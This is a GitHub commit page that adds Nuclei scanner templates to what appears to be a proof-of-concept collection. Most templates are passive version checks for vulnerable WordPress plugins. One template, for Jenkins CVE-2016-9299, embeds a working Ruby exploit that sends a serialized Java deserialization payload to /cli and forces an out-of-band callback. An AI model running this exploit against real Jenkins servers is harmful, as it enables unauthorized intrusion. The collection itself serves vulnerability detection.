-
Notifications
You must be signed in to change notification settings - Fork 272
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
63b1127
commit 4fc5b88
Showing
219 changed files
with
13,085 additions
and
1 deletion.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
20241030 | ||
20241031 |
59 changes: 59 additions & 0 deletions
59
poc/auth/mycred-for-elementor-e30e983bb02401924b572068b6c5451f.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,59 @@ | ||
id: mycred-for-elementor-e30e983bb02401924b572068b6c5451f | ||
|
||
info: | ||
name: > | ||
myCred Elementor <= 1.2.6 - Authenticated (Contributor+) Stored Cross-Site Scripting | ||
author: topscoder | ||
severity: low | ||
description: > | ||
reference: | ||
- https://github.com/topscoder/nuclei-wordfence-cve | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/0fe2e1d6-7431-4121-93ad-cfe7837ac374?source=api-scan | ||
classification: | ||
cvss-metrics: | ||
cvss-score: | ||
cve-id: | ||
metadata: | ||
fofa-query: "wp-content/plugins/mycred-for-elementor/" | ||
google-query: inurl:"/wp-content/plugins/mycred-for-elementor/" | ||
shodan-query: 'vuln:' | ||
tags: cve,wordpress,wp-plugin,mycred-for-elementor,low | ||
|
||
http: | ||
- method: GET | ||
redirects: true | ||
max-redirects: 3 | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/mycred-for-elementor/readme.txt" | ||
|
||
extractors: | ||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
internal: true | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- "mycred-for-elementor" | ||
part: body | ||
|
||
- type: dsl | ||
dsl: | ||
- compare_versions(version, '<= 1.2.6') |
59 changes: 59 additions & 0 deletions
59
poc/aws/CVE-2024-49634-2ec2de08e397d2077d08a4542cf24086.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,59 @@ | ||
id: CVE-2024-49634-2ec2de08e397d2077d08a4542cf24086 | ||
|
||
info: | ||
name: > | ||
BP Member Type Manager <= 1.01 - Reflected Cross-Site Scripting | ||
author: topscoder | ||
severity: medium | ||
description: > | ||
The BP Member Type Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.01 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | ||
reference: | ||
- https://github.com/topscoder/nuclei-wordfence-cve | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d167a483-7190-4285-a055-2280cc36f9c6?source=api-prod | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2024-49634 | ||
metadata: | ||
fofa-query: "wp-content/plugins/bp-member-type-manager/" | ||
google-query: inurl:"/wp-content/plugins/bp-member-type-manager/" | ||
shodan-query: 'vuln:CVE-2024-49634' | ||
tags: cve,wordpress,wp-plugin,bp-member-type-manager,medium | ||
|
||
http: | ||
- method: GET | ||
redirects: true | ||
max-redirects: 3 | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/bp-member-type-manager/readme.txt" | ||
|
||
extractors: | ||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
internal: true | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- "bp-member-type-manager" | ||
part: body | ||
|
||
- type: dsl | ||
dsl: | ||
- compare_versions(version, '<= 1.01') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,59 @@ | ||
id: surveyjs-cd16aaba63a1955d07ab2e32ec2b02e5 | ||
|
||
info: | ||
name: > | ||
SurveyJS: Drag & Drop WordPress Form Builder <= 1.9.136 - Authenticated (Subscriber+) Arbitrary File Upload | ||
author: topscoder | ||
severity: low | ||
description: > | ||
reference: | ||
- https://github.com/topscoder/nuclei-wordfence-cve | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/07f6bf26-0b01-48be-bfe1-8213c5d5983f?source=api-scan | ||
classification: | ||
cvss-metrics: | ||
cvss-score: | ||
cve-id: | ||
metadata: | ||
fofa-query: "wp-content/plugins/surveyjs/" | ||
google-query: inurl:"/wp-content/plugins/surveyjs/" | ||
shodan-query: 'vuln:' | ||
tags: cve,wordpress,wp-plugin,surveyjs,low | ||
|
||
http: | ||
- method: GET | ||
redirects: true | ||
max-redirects: 3 | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/surveyjs/readme.txt" | ||
|
||
extractors: | ||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
internal: true | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- "surveyjs" | ||
part: body | ||
|
||
- type: dsl | ||
dsl: | ||
- compare_versions(version, '<= 1.9.136') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,123 @@ | ||
id: CVE-2016-9299 | ||
|
||
info: | ||
name: Jenkins CLI - HTTP Java Deserialization | ||
author: iamnoooob,rootxharsh,pdresearch | ||
severity: critical | ||
description: | | ||
The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server. | ||
reference: | ||
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/jenkins_ldap_deserialize.rb | ||
- https://nvd.nist.gov/vuln/detail/CVE-2016-9299 | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.8 | ||
cve-id: CVE-2016-9299 | ||
cwe-id: CWE-90 | ||
cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* | ||
metadata: | ||
max-request: 1 | ||
verified: true | ||
vendor: jenkins | ||
product: jenkins | ||
shodan-query: product:"jenkins" | ||
fofa-query: icon_hash=81586312 | ||
tags: cve,cve2016,rce,deserialization | ||
|
||
variables: | ||
oast: "{{interactsh-url}}" | ||
|
||
code: | ||
- engine: | ||
- rb | ||
- ruby # requires ruby to be pre-installed on system running nuclei | ||
|
||
source: | | ||
require 'socket' | ||
require 'base64' | ||
# Define environment variables for host details (make sure they are properly set in your environment) | ||
$Hostname = ENV['Hostname'] | ||
$Host = ENV['Host'] | ||
$Port = ENV['Port'] | ||
interactsh = (ENV['oast']).ljust(45,'/') | ||
url_dns = "aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff74002d657761776a7763737778766b6a66737763716c69316673737632357271306438642e6f6173742e6f6e6c696e6574000071007e0005740004687474707078740034687474703a2f2f657761776a7763737778766b6a66737763716c69316673737632357271306438642e6f6173742e6f6e6c696e6578" | ||
$decoded_url_dns = [url_dns].pack("H*") | ||
$decoded_url_dns = $decoded_url_dns.gsub! "ewawjwcswxvkjfswcqli1fssv25rq0d8d.oast.online", interactsh | ||
# Step 1: Send the download request without waiting for a response or closing the socket | ||
def send_download_request(host, port) | ||
download_socket = TCPSocket.new(host, port) | ||
download_request = <<~REQ | ||
POST /cli HTTP/1.1 | ||
Host: #{$Hostname} | ||
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e93 | ||
Side: download | ||
Content-Type: application/x-www-form-urlencoded | ||
Content-Length: 0\r\n | ||
REQ | ||
#puts "Sending Download Request..." | ||
download_socket.write(download_request) | ||
# Return the open socket so we can read from it later | ||
return download_socket | ||
end | ||
# Step 2: Send the upload request | ||
def send_upload_request(host, port) | ||
socket = TCPSocket.new(host, port) | ||
# Base64 decoded payload for upload request | ||
chunked_payload = "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=\x00\x00\x00\x00\x01\x55" + $decoded_url_dns | ||
upload_request = <<~REQ | ||
POST /cli HTTP/1.1 | ||
Host: #{$Hostname} | ||
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e93 | ||
Side: upload | ||
Content-Type: application/octet-stream | ||
Content-Length: #{chunked_payload.bytesize}\r\n | ||
REQ | ||
#puts "Sending Upload Request..." | ||
socket.write(upload_request) | ||
# Send the binary data (payload) | ||
socket.write(chunked_payload) | ||
# Read and print the response for the upload request | ||
response = socket.readpartial(1024) | ||
#puts "Received from server (upload response): #{response}" | ||
# Close the socket for upload request | ||
socket.close | ||
end | ||
# Step 3: After upload request, read the download request's response | ||
def read_download_response(socket) | ||
#puts "Reading Download Request Response..." | ||
response = socket.readpartial(1024) | ||
socket.close | ||
response | ||
end | ||
# Combined steps to perform the operations in the required order | ||
# Step 1: Send download request (don't wait for response, keep the socket open) | ||
download_socket = send_download_request($Host, $Port) | ||
# Step 2: Send upload request | ||
send_upload_request($Host, $Port) | ||
# Print the download response | ||
puts read_download_response(download_socket) | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- "contains(response,'hudson.remoting.UserRequest')" | ||
- 'contains(interactsh_protocol, "dns")' | ||
condition: and | ||
# digest: 490a0046304402203cca921300c636eb8d986136c3b5dd567649cc0e956e016278f9e8e6d2e2f14602207e558f218d7293d1e2d1fa942bc313b240086e5f74545143c5553d3d044b4831:922c64590222798bb761d5b6d8e72950 |
59 changes: 59 additions & 0 deletions
59
poc/cve/CVE-2023-46606-d2704f0b26ff9bb4048f99cda838a52f.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,59 @@ | ||
id: CVE-2023-46606-d2704f0b26ff9bb4048f99cda838a52f | ||
|
||
info: | ||
name: > | ||
AtomChat <= 1.1.4 - Missing Authorization via credits REST API Endpoint | ||
author: topscoder | ||
severity: high | ||
description: > | ||
The AtomChat plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'credits' REST API function in versions up to, and including, 1.1.4. This makes it possible for unauthenticated attackers to manipulate user credits when the myCred plugin is installed. | ||
reference: | ||
- https://github.com/topscoder/nuclei-wordfence-cve | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/21f917a4-efee-421b-98b1-a9b18c7527d2?source=api-prod | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N | ||
cvss-score: 5.3 | ||
cve-id: CVE-2023-46606 | ||
metadata: | ||
fofa-query: "wp-content/plugins/atomchat/" | ||
google-query: inurl:"/wp-content/plugins/atomchat/" | ||
shodan-query: 'vuln:CVE-2023-46606' | ||
tags: cve,wordpress,wp-plugin,atomchat,high | ||
|
||
http: | ||
- method: GET | ||
redirects: true | ||
max-redirects: 3 | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/atomchat/readme.txt" | ||
|
||
extractors: | ||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
internal: true | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- "atomchat" | ||
part: body | ||
|
||
- type: dsl | ||
dsl: | ||
- compare_versions(version, '<= 1.1.4') |
Oops, something went wrong.